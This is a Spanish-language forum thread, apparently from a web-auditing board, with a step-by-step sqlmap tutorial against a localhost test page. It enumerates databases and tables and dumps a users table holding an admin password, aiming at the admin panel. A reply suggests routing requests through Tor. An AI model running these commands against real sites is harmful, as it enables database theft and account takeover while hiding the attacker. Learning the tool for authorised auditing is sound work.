Bueno aquí les dejo este tutorial que me apeteción hacerles por si a caso les hacía falta alguna vez...

Empecemos, después de fijar en nuestro punto de mira la web,
navegamos al directorio de Sqlmap.

Código: Seleccionar todo

jimbo@jimbo-1:~/Escritorio/BT/sqlmap$
Vamos a identificar las bases de datos

Código: Seleccionar todo

$ ./sqlmap.py -u http://localhost/explotable/producto.php?id=5387 --dbs
Llegará a un punto en el que nos diga:

Código: Seleccionar todo

GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
¿Qué quiere decir?
Dice que el parametro id=5387 es vulnerable, y si queremos que pruebe con otros distintos.
¿Para qué queremos que siga testeando si ya tenemos el agujero?
Para nada, pues le decimos que no, tecleando Y le dejamos que siga...
Cuando termine recibiremos las bases de datos

Código: Seleccionar todo

[12:51:29] [INFO] fetching database names
[12:51:29] [INFO] fetching number of databases
[12:51:29] [INFO] retrieved: 2
[12:51:34] [INFO] retrieved: information_schema
[12:53:07] [INFO] retrieved: jimboprogram
available databases [2]:
[*] information_schema
[*] jimboprogram
Vale, ahora identificaremos las tablas de la base de datos que queramos.

Código: Seleccionar todo

$ ./sqlmap.py -u http://localhost/explotable/producto.php?id=5387 -D jimboprogram --tables
Una vez terminado obtendremos las tablas

Código: Seleccionar todo

[7 tables]
+------------+
| encuestas  |
| ips        |
| telefonos |
| noticias   |
| respuestas |
| secciones  |
| usuarios   |
+------------+
¿Qué es lo que nos llama la atención de todas esas tablas, que nos interese?
Pues los usuarios.
Así que tendremos que dumpear para obtener los datos de las columnas de los usuarios.

Código: Seleccionar todo

./sqlmap.py -u http://localhost/explotable/producto.php?id=5387 -D jimboprogram -T usuarios --dump
Cuando termine, al fin, tendremos los datos que queríamos obtener

Código: Seleccionar todo

Database: jimboprogram
Table: usuarios
[1 entry]
+------------+------------+-------+----------+-------+------------+
| fechacad   | id_usuario | otro1 | pass     | tipo  | usuario    |
+------------+------------+-------+----------+-------+------------+
| 0000-00-00 | 1          | 0     | jimbo123 | admin | administrador |
+------------+------------+-------+----------+-------+------------+
Tenemos el usuario y la contraseña, así que lo único que nos falta es acceder al panel de administración.

Espero que les haya quedado claro.
Paz hermanos
Si por cada vulnerabilidad en Windows muriese una persona solo quedaríamos tú y yo.
Es el que más me gusta para las auditorías. Buen post.

Un saludo!
Soy un camaleón, en tu cama, leona ♪
una cosa a tener en cuenta y que no han nombrado es la funcionalidad de enviar las peticiones atraves de un proxy algo muy importante a mi parecer.

--tor Use default Tor (Vidalia/Privoxy/Polipo) proxy address

Salu2!
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

Responder

Volver a “Auditoria Web”